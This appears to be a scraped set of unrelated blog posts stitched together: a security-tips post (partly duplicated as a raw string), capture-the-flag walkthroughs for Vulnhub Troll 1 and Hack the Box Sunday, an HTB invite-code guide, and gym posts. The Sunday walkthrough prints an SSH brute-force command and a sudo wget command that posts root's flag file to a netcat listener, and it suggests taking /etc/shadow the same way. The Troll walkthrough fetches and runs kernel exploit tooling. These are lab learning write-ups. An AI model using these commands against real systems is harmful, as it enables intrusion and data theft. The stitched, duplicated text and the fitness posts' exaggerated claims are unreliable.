| title | Common security mistakes you can avoid |
| body | The internet has become an 4th necessity of our life. From socializing to shopping to paying bills, we do everything online. Thanks to our smartphones, we are permanently logged in to our email and social media accounts.

We're connected 24x7 to the digital world, so we end up exposing ourselves to a number of cyber security threats, identity theft, fraud in payments, anything can happen if we’re not careful. In order to make sure that you have a safe online experience, here are some mistakes you should. 1. Not changing passwords often Weak passwords are said to be one of the leading reasons for cyber crimes. It’s therefore advisable to avoid having passwords that are just letters or numbers. This is why now a days, lot of sites insist on inclusion of special characters. The more complex a password, the stronger it is.Remember: "noonecanstealmypassword" (ignore the quotes) is much much stronger than some 7 or 8 character (including special characters). To brute force this length of password is next to impossibleIt’s also a good practice to keep changing all your passwords from time to time, for which many companies have a 30 day password changing policy. There are apps that help you remember multiple passwords, so avoid writing down your passwords in a diary or book. 2. Replying to unsolicited mails For all the intelligent online practices we follow, there are times when we fall prey to phishing mails. Such mails are crafted in a way that they tempt you into replying to them either with your sensitive personal details like passwords and card numbers or even some security questions. The ground rule while replying to any mail should be that if you find it suspicious, **DO NOT REPLY** to it. Do a double check (generally these mails have some spelling mistakes or incorrect email address) or verify its authenticity before replying to it. 3. Downloading attachments or apps from untrusted websites If you come across any mail that insists on you downloading an attachment or some site asking you install an app you know nothing about, a good idea would be to delete that message or mail altogether. There’s a good chance it could be malware/virus (as it happened in 2017 - Wanna Cry Ransomware) aimed at gaining unauthorized access to your laptop or phone. One thing that can be done is searching on Google and downloading that app from trusted source 4. Using an unknown internet connection or public wi-fi This is the most common mistakes of all. While traveling or when at a public place, we often use whatever internet or wi-fi connection is available to us. There are times we also make online payments using such a connection. By doing this, we end up compromising our security. This is because public wi-fi is more vulnerable than a trusted connection. By avoiding these mistakes, you can protect your online experience from cyber attacks to a large extent. However, sometimes, in spite of all the measures you take, your device gets compromised. Ultimately, your security is in your hands and should you need any help, there’s plenty of resources available on internet. The best way to protect yourself is to educate yourself

|

The ground rule while replying to any mail should be that if you find it suspicious, **DO NOT REPLY** to it. Do a double check (generally these mails have some spelling mistakes or incorrect email address) or verify its authenticity before replying to it.\n\n3. Downloading attachments or apps from untrusted websites\nIf you come across any mail that insists on you downloading an attachment or some site asking you install an app you know nothing about, a good idea would be to delete that message or mail altogether. There’s a good chance it could be malware/virus (as it happened in 2017 - Wanna Cry Ransomware) aimed at gaining unauthorized access to your laptop or phone. One thing that can be done is searching on Google and downloading that app from trusted source\n\n4. Using an unknown internet connection or public wi-fi\nThis is the most common mistakes of all.\nWhile traveling or when at a public place, we often use whatever internet or wi-fi connection is available to us. There are times we also make online payments using such a connection. By doing this, we end up compromising our security. This is because public wi-fi is more vulnerable than a trusted connection.\n\nBy avoiding these mistakes, you can protect your online experience from cyber attacks to a large extent. However, sometimes, in spite of all the measures you take, your device gets compromised.\nUltimately, your security is in your hands and should you need any help, there’s plenty of resources available on internet. The best way to protect yourself is to educate yourself\n\n

",

| title | Vulnhub: Troll 1 Walkthrough |
| body | This time I decided to try with another website i.e. vulnhub. This platform does not require to get the invite code and connect to it's VPN. It's simple, just download the .vmdk file and install it in virtual player (VMware workstation or virtual box)

As usual, start with nmap scan

We can clearly see that 3 ports are open. The FTP (21), SSH (22) and HTTP (80). ftp to the machine and you'll find the "lol.pcap" file ftp://192.168.97.143 On analyzing via the WireShark I found a text

If you open the http page you'll find the image

Run dirb on the http port you'll find the "secret" folder dirb http://192.168.97.143

Looks like we got trolled again. After some cursing and banging my head, I finally tried the directory name in the browser

Let’s download it and analyze it.

So we found the address to proceed

The Good Luck folder contains a txt file.

Seems to be the usernames or passwords. This might be useful in ssh

The second folder seems to contain passwords.

It seems that we are trolled again. With which_one_lol.txt, I tried to brute force the ssh to see if I could get into any of the accounts, but no luck there After a bunch of time, attempts, and anger I realized that what I thought was a password didn't work with any of the usernames, so I looked at the last two folder structures and decided to see if "Pass.txt" was the password as opposed to "Good_job_:)" since the folder did say, "this_folder_contains_the_password". Sticking with the trolling theme, that password worked with one of the accounts (overflow). I must admit that "Pass.txt" was very intelligent password

ssh [email protected] Note: if you get error while connecting to ssh "specify the port no" Now it’s time to enumerate the OS. Download the below script using wget wget https://raw.githubusercontent.com/mzet-/linux-exploit-suggester/master/linux-exploit-suggester.sh -O les.sh https://github.com/mzet-/linux-exploit-suggester

Do a chmod on les.sh and make it executable and run it

You'll get list of all exploits. I tried "dirtycow" but somehow it didn't work, so I moved to "dirty cow 2" exploit, but that required installation of g++ (since it a .cpp file) which was not possible. So I tried with overlayfs. There's also CVE number attached, if you want to learn more about the exploit.

I tried with "ovl_setattr", but that prompted me to create another user. Note: There are many other exploits available for Ubuntu 14.04.1, you can try anyone you like.

Overall this was a pretty easy one (except for a part or two)

|

| title | Hack the Box: Sunday |
| body | By now, you know how to obtain HTB invite and how to connect to it's VPN, Let's start with Sunday machine Level: Intermediate Flags: To find user.txt and root.txt file As a thumb rule always start with scanning the machine via nmap nmap -sS -O -A 10.10.10.76 -p 1-65535

Observe that port 22022 - SSH and port 79 - Sun Solaris Finger are vulnerable You can use the finger service to see information about users that are logged in. Immediately, we can identify the user Sunny is using the finger service. If we want to identify more users, we can use the Metasploit module.
>
I also searched for sunssh exploit, but came up with nothing

Well, that leaves us with a couple of options: brute force our way in with SSH or a password guessing attack. Always opt for a password guessing attack first. Usually, in Hack the box, the name means something. I decided to try a few passwords out for Sunny. The password was **sunday** OR you can brute force your way through patator patator ssh_login host=10.10.10.76 port=22022 user=sunny password=FILE0 0=password.txt persistent=0 For that you'll need password.txt file for brute forcing. You can download it on Internet. But when I tried to login into ssh by using above credential, it gave “no matching key exchange method found” error. By googling I found https://unix.stackexchange.com/questions/340844/how-to-enable-diffie-hellman-group1-sha1-key-exchange-on-debian-8-0

Here after browsing through some directories I found, backup folder

The file of interest is the shadow.backup. If you’re new to this, the shadow file contains the hashes for users and is usually only accessible by root and those in the sudoers file

There is another user sammy, if you're good in cryptography, you'll know that $5$ hash uses Sha256 Now copy the hash and use john the ripper to crack it. You can download the rockyou.txt list from the internet.

Login as sammy. Always type "sudo -l" to see what permissions does user have.

You'll get the user.txt

Observe that you have permission to run wget as sudo. The other flag root.txt is located in /root we can post the content of root.txt file directly to the listening machine Set up a netcat listener. "nc -nvlp 8081" sudo wget --post-file=/root/root.txt 10.10.14.12:8081

This was the easy way. You can also use wget to transfer /etc/shadow file to obtain the root hash and then crack it to obtain root password. But that would consume a considerable amount of time. Thus you've obtained the user.txt and root.txt files. Here important thing to note was the usage of "wget"

|

| body | Recently a friend of mine suggested to start playing CTF (Capture The Flag). So I started with "Hack the box". Hack the box is basically a platform to test your skills in Penetration Testing. In order to sign up, you've to crack the invite code

Start with inspect element and analyze that. You'll find a script as /js/inviteapi.min.js

So now, go to https://www.hackthebox.eu/js/inviteapi.min.js . You will see a file like this

This is the point where I got stuck, since I don't have that much hold on JavaScript. So I'd search the web for further clarification. Finally found a tool called [jsbeautifier](https://beautifier.io/) "JavaScript beautifier" is a tool to unpack or deobfuscate JavaScript and HTML

You will see that there is a function named makeInviteCode() This function actually make/generates your required invite code Now make a POST request to the url mentioned in the function (/api/invite/how/to/generate)

Observe that Base64 Encoding is used. Search online for Base64 decoder and decrypt it

Again make a POST request to /api/invite/generate
Notice that it says format:encoded, So try with base64 decoder

And voila, you've got the invite code. Happy Hunting Note: You'll not always be able to capture the flag, there'll be times when you'll get stuck, but that's the fun part of playing CTF's. You'll always learn something new.

|

| body | A lot of people are embarrassed to admit that they workout. It's the strangest thing, but I know why this happens. You start working out and **you're afraid to tell people because if you make no progress, people will judge you.** Then, you make progress, but you're afraid to tell people because then they might try to "bring you down" and make fun of you for training. So then you make up some excuse.
*That's Bullshit. You workout because you want to look better. You want to feel better about yourself. You want to get laid.*

I say, EMBRACE IT! Be proud to workout. FYI, it's combination of having more confidence and getting laid.
**Let me know in the comments below.**
|

| title | How much can you grow?? |
| body | As a natural lifter, your body can only gain so much muscle, even if you're doing everything else right.

If you're a beginner, you can enjoy some beginner gains. Most beginners can gain up to 30 lbs in one year provided you focus on your nutrition, most of that muscle will come within the first 3-4 months. After you've gained your first 20-30 lbs of muscle, you're an intermediate. Now, muscle growth will slow down. Expect to gain 10-15 lbs maximum over the course of the next year. After 2 years , your muscle growth will almost come to a halt. After all, you've already gained 30-45 lbs of muscle! After that, expect to gain between 2-7 lbs of muscle per year. At this point in your life though, you'll probably be **VERY HAPPY** with your physique, so replace the slow gains with other goals like getting leaner, stronger, or focusing on a lagging body part.
**Thanks for reading. Stay tuned for more**
|

| body |

This is one of the myths that kill many people on a daily basis. Your brain need carbs to be happy, Your body need carbs to be happy, You need carbs to be happy. Now many people may argue that avoiding carbs at night make you lose fat. Well, completely avoiding carbs could drastically reduce your caloric intake, thus making you lose weight in the long run through an indirectly induced caloric deficit. Does carbs make you fat?? Not at all. it’s the total amount of calories that you consume during the day that will indicate whether you’re going to gain or lose weight and not the timing of the nutrients be it carbs or fats.
**Note if the Macros/calories are matched, no single nutrient taken at any period of time will have an impact on your body composition, no matter the time of assumption. Re-read this and print it in your mind.**
Personally, I enjoy having my carbs at night as they allow me to fall asleep quicker.
**🔥🔥🔥When do you prefer eating your carbs? Guys, Comment down below!**
|
